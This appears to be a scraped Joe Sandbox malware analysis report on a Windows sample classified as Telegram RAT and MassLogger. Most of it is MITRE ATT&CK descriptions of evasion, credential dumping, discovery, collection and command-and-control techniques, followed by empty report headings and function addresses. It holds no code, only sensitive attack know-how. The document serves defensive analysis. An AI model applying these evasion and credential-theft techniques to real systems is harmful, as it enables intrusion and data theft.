Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z87sammylastborn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z87sammylastborn.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
z87sammylastborn.exe

Function 0507A6A0 Relevance: 1.9, Strings: 1, Instructions: 650
COMMON

Function 00CAD540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0507A30C Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 0507A318 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00CAB298 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Function 0507437C Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Function 06C51145 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 04FA1334 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 00CA590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre